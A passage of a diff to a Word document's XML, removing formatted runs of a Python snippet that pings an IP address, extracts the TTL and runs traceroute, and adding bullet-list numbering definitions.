-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ping_proc.communicate</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        if </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ping_proc.returncode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> == 0:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            output = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ping_stdout.decode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ttl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>re.search</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>('</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ttl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>=?\d+', output).group(0)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ttl_value</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>re.search</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(r'\d+', </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ttl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>).group(0)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ttl_value_int</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = int(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ttl_value</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>elif</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ping_proc.returncode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> != 0:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            print("{} is not responding to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>pings".format</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ip_addr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            continue</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>traceroute_proc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>subprocess.Popen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(['traceroute', '{}'.format(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ip_addr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">)], </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>stdout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>subprocess.PIPE</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -6712,6 +9548,243 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="156B6A29"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="C7104214"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="54881DA0"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="8598AB00"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
